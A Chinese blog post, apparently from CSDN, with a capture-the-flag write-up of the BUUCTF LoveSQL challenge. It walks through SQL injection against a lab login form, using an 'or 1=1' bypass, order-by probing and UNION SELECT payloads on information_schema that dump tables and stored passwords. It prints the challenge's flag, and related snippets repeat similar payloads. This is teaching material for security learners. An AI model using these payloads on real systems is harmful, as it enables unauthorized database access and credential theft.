[极客大挑战 2019]LoveSQL 1解题思路

最新推荐文章于 2025-06-06 15:27:53 发布
最新推荐文章于 2025-06-06 15:27:53 发布
阅读量1.7k 收藏 19
点赞数 21
CC 4.0 BY-SA版权
分类专栏: BUUCTF 文章标签: 数据库 网络安全 web安全 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MyZy_/article/details/144847391

[极客大挑战 2019]LoveSQL 1

代码审计,发现表单方式为get提交到check.php

image-20241105083124644

万能密码

admin' or 1=1 #

image-20241105083619218

登录成功,这边我以为密码就是flag,结果并不是,结合题目信息,猜想这应该是根据账号密码的注入

image-20241105083633321

尝试闭合?username=admin' and 1=1%23&password=d3c9cf30a12d1f13d4f778859fb16f73正常显示,?username=admin' and 1=2%23&password=d3c9cf30a12d1f13d4f778859fb16f73显示账号密码错误

image-20241105084835580

存在闭合注入,order by探测字段,order by 4,显示列错误,判断出字段数为3

?username=admin' order by 4%23&password=d3c9cf30a12d1f13d4f778859fb16f73

image-20241105085010073

这边有个小坑,之前一直用admin来做账号,结果发现闭合之后随便都是登录进去的,导致union显示不出来注入点,所以随便改了个username,然后进行union联合点查找

?username=abc' union select 1,2,3%23&password=111

image-20241105085749956

根据显示判断2和3都是注入点(怀疑sql是这么写的:username=usernameandpassword={username} and password=usernameandpassword={password},心可真大)

爆库(回显3为例)

?username=abc' UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata%23&password=111

image-20241105090127015

发现数据库geek,爆表

?username=abc' UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema="geek"%23&password=111

image-20241105090254895

发现两个表,爆字段

?username=abc' UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1"%23&password=111

image-20241105090607597

爆值

?username=abc' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=111

image-20241105091000630

太长了我复制下来

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{0430bf83-c7cb-403f-8965-54dae295b134}'

成功找到flag

flag{0430bf83-c7cb-403f-8965-54dae295b134}

BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 782
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
[极客挑战 2019]LoveSQL
kuller_Yan的博客
05-19 424
[极客挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看题目 一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
BUUCTF Web [极客挑战 2019]LoveSQL
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 一、题目简介 进入题目连接是一个「登录」界面 登录「成功」会显示当前用户的账号和密码 登录「失败」则会则会提示错误的用户名和密码 二、思路分析         这一关是「SQL注入」漏洞,注入点.
[极客挑战 2019]LoveSQL1
最新发布
m0_74135202的博客
06-06 358
【代码】[极客挑战 2019]LoveSQL1
[极客挑战2019]LoveSQL(刚!刚!刚!)
Rick66Ashley的博客
08-10 196
回到题目,要查geek的数据表,那要加上数据库为geek的条件,即:1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #中间的可以查看表名1' union select 1,2,group_concat(table_name) from information_schema.tables #1' or 1=1 # 密码随便输,enter,发现可以注入;
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 433
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
【学习笔记 27】 buu [极客挑战 2019]BabySQL
weixin_43553654的博客
07-28 276
0x00 知识点 union injection(联合注入) 双写注入绕过 0x01 知识点详解 1. 什么是union injection(联合注入)? 答:详情请查看我的第23篇学习笔记 2.什么是双写绕过? 答:这里推测是利用replace函数将检索到第一个关键词替换为空格,但是当我们重复书写后就可以绕过。例如:我们可以将union替换为ununionion来进行绕过。 0x02 解题思路 登录网站查看网站 看这个网站有点像之前做的那道lovesql那道题,再加上名字,不用想,肯定是注入了。先
buuctf(web)部分实操题和知识点
Z11762的博客
04-18 1046
这里跟前面做过的一个看后端源码的题很相似,就是:PHP的文件包含函数有一个「特性」,被包含的文件内容中,如果是「代码」则会执行,而不会在页面中展示;针对这一特性,我们可以使用PHP伪协议对文件内容进行「编码」,编码后的文件内容由于不能被执行,会展示在页面中,而后再将页面中的内容复制到本地进行「解码」,即可查看文件内容,拿到 flag。"https://Sycsecret.buuoj.cn" 是一个URL,指向一个名为 "Sycsecret.buuoj.cn" 的网站或资源。之后界面显示“No!
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2588
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF全题解目录(一)
qq_42812036的博客
02-13 3810
web [HCTF 2018]WarmUp 全解:https://www.jianshu.com/p/1c2998973197 PHP 代码审计 phpmyadmin 4.8.1任意文件包含 [强网杯 2019]随便注 比赛web题全解:https://www.jianshu.com/p/db6e2576b674 fuzz一下,过滤规则得出,然后 show tables =>得表名 show...
极客挑战2019LoveSQL解题
Bird&Bird
10-25 2655
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
[极客挑战 2019]loveSQL 1
01-14
### 极客挑战 2019 LoveSQL 比赛内容 #### SQL 注入漏洞利用过程 在极客挑战 2019LoveSQL 题目中,参与者需要通过一系列操作来获取 flag。具体来说: - 参与者首先发现了 `Secret.php` 文件并访问该页面[^2]。 - 为了绕过某些安全机制,参与者伪造了 HTTP 请求头中的 Referer 字段,并修改 User-Agent 为特定字符串 "Syclover"[^2]。 - 此外,还进行了 XFF (X-Forwarded-For) 头部的伪造以进一步规避检测措施。 这些步骤帮助参赛选手成功触发了应用程序中存在的 SQL 注入漏洞。 #### 利用联合查询技术提取数据 当面对具有两个字段的结果集时,可以采用简单的联合查询方法来枚举数据库结构和其他敏感信息。例如,在此案例中使用的语句 `-1' union select 1,database()#` 成功返回了当前数据库名称[^3]。 更深入地挖掘系统内部的信息,则可以通过扩展上述查询语句的方式实现。比如下面这条命令用于检索用户表内的记录详情: ```sql 1' union select 1,2,group_concat(id,username,password) from geekuser# ``` 这使得攻击者能够获得所有用户的 ID、用户名以及密码哈希值[^5]。 #### 获取最终 Flag 在整个过程中,最重要的是找到隐藏于应用逻辑深处的目标标志(Flag)。对于本题而言,最终取得胜利的关键在于正确构造请求参数从而揭示出预期形式的 Flag 值:`flag{62da5cdb-c71f-4cbd-afdd-cdcd052b610c2d}`[^1] 和 `Your password is '1admin02c039daff423020bb2e39a03514c659'`。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成为别人口中的IT高手

写文章不容易,充充电吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值